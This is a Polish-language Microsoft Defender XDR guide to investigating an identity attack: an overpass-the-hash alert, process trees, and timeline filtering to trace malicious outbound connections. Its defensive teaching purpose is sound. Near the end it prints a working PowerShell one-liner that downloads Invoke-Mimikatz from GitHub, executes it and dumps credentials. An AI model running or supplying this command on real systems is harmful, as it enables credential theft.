Przykład ataku opartego na tożsamościach

  • Artykuł

Dotyczy:

  • Microsoft Defender XDR

Microsoft Defender for Identity może pomóc w wykrywaniu złośliwych prób naruszenia tożsamości w organizacji. Ponieważ usługa Defender for Identity integruje się z usługą Microsoft Defender XDR, analitycy zabezpieczeń mogą mieć wgląd w zagrożenia pochodzące z usługi Defender for Identity, takie jak podejrzane próby podniesienia uprawnień netlogonu.

Analizowanie ataku w Microsoft Defender for Identity

Microsoft Defender XDR umożliwia analitykom filtrowanie alertów według źródła wykrywania na karcie Alerty na stronie zdarzeń. W poniższym przykładzie źródło wykrywania jest filtrowane do usługi Defender for Identity.

Filtrowanie źródła wykrywania w Microsoft Defender for Identity

Wybranie alertu o podejrzanym ataku typu overpass-the-hash przechodzi do strony w Microsoft Defender for Cloud Apps, która wyświetla bardziej szczegółowe informacje. Aby dowiedzieć się więcej na temat alertu lub ataku, wybierz pozycję Dowiedz się więcej o tym typie alertu , aby przeczytać opis sugestii dotyczących ataku i korygowania.

Podejrzany alert o ataku na wiadukt

Badanie tego samego ataku w Ochrona punktu końcowego w usłudze Microsoft Defender

Alternatywnie analityk może użyć usługi Defender for Endpoint, aby dowiedzieć się więcej na temat działania w punkcie końcowym. Wybierz zdarzenie z kolejki zdarzeń, a następnie wybierz kartę Alerty . W tym miejscu mogą również zidentyfikować źródło wykrywania. Źródło wykrywania oznaczone jako EDR oznacza wykrywanie i reagowanie punktów końcowych, czyli defender for Endpoint. W tym miejscu analityk wybiera alert wykryty przez EDR.

Wykrywanie i reagowanie punktu końcowego w portalu Ochrona punktu końcowego w usłudze Microsoft Defender

Na stronie alertu są wyświetlane różne istotne informacje, takie jak nazwa urządzenia, nazwa użytkownika, stan automatycznego badania i szczegóły alertu. W artykule alertu przedstawiono wizualną reprezentację drzewa procesów. Drzewo procesów jest hierarchiczną reprezentacją procesów nadrzędnych i podrzędnych związanych z alertem.

Drzewo procesu alertu w Ochrona punktu końcowego w usłudze Microsoft Defender

Każdy proces można rozszerzyć, aby wyświetlić więcej szczegółów. Szczegółowe informacje, które może zobaczyć analityk, to rzeczywiste polecenia wprowadzone w ramach złośliwego skryptu, adresów IP połączeń wychodzących i innych przydatnych informacji.

Szczegóły procesu w portalu Ochrona punktu końcowego w usłudze Microsoft Defender

Wybierając pozycję Zobacz na osi czasu, analityk może jeszcze bardziej przejść do szczegółów, aby określić dokładny czas naruszenia zabezpieczeń.

Ochrona punktu końcowego w usłudze Microsoft Defender może wykrywać wiele złośliwych plików i skryptów. Jednak ze względu na wiele legalnych zastosowań połączeń wychodzących, programu PowerShell i działania wiersza polecenia niektóre działania byłyby uważane za niegroźne do momentu utworzenia złośliwego pliku lub działania. W związku z tym użycie osi czasu pomaga analitykom umieścić alert w kontekście otaczającego działania w celu określenia oryginalnego źródła lub czasu ataku, który w przeciwnym razie jest zasłonięty przez typowe działanie systemu plików i użytkownika.

Aby użyć osi czasu, analityk rozpoczynał wykrywanie alertów (na czerwono) i przewijał w dół w czasie, aby określić, kiedy oryginalne działanie, które doprowadziło do faktycznego uruchomienia złośliwego działania.

Czas rozpoczęcia wykrywania alertów przez analityka

Ważne jest, aby zrozumieć i odróżnić typowe działania, takie jak połączenia Windows Update, ruch aktywacji zaufanego oprogramowania systemu Windows, inne typowe połączenia z witrynami firmy Microsoft, działania internetowe innych firm, działanie Configuration Manager punktu końcowego firmy Microsoft i inne łagodne działania związane z podejrzanymi działaniami. Jednym ze sposobów rozróżnienia jest użycie filtrów osi czasu. Istnieje wiele filtrów, które mogą wyróżniać określone działania podczas filtrowania niczego, czego analityk nie chce wyświetlać.

Na poniższej ilustracji analityk przefiltrował dane, aby wyświetlić tylko zdarzenia sieciowe i procesowe. Te kryteria filtru umożliwiają analitykowi wyświetlanie połączeń sieciowych i procesów otaczających zdarzenie, w którym Notatnik nawiązał połączenie z adresem IP, który również widzieliśmy w drzewie procesów.

Jak Notatnik został użyty do nawiązania złośliwego połączenia wychodzącego

W tym konkretnym zdarzeniu Notatnik został użyty do utworzenia złośliwego połączenia wychodzącego. Jednak często osoby atakujące używają iexplorer.exe do nawiązywania połączeń w celu pobrania złośliwego ładunku, ponieważ zwykle procesy iexplorer.exe są uważane za regularne działanie przeglądarki internetowej.

Innym elementem, który ma zostać wyszukany na osi czasu, jest użycie programu PowerShell dla połączeń wychodzących. Analityk poszuka pomyślnych połączeń programu PowerShell za pomocą poleceń, takich jak IEX (New-Object Net.Webclient) połączenie wychodzące z witryną internetową hostującą złośliwy plik.

W poniższym przykładzie program PowerShell został użyty do pobrania i wykonania programu Mimikatz z witryny internetowej:

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds

Analityk może szybko wyszukiwać słowa kluczowe, wpisując słowo kluczowe na pasku wyszukiwania, aby wyświetlić tylko zdarzenia utworzone za pomocą programu PowerShell.

Następny krok

Zobacz ścieżkę badania wyłudzania informacji .

Zobacz też

Porada

Chcesz dowiedzieć się więcej? Zaangażuj się w społeczność rozwiązań zabezpieczających firmy Microsoft w naszej społeczności technicznej Społeczność techniczna usługi Microsoft Defender XDR.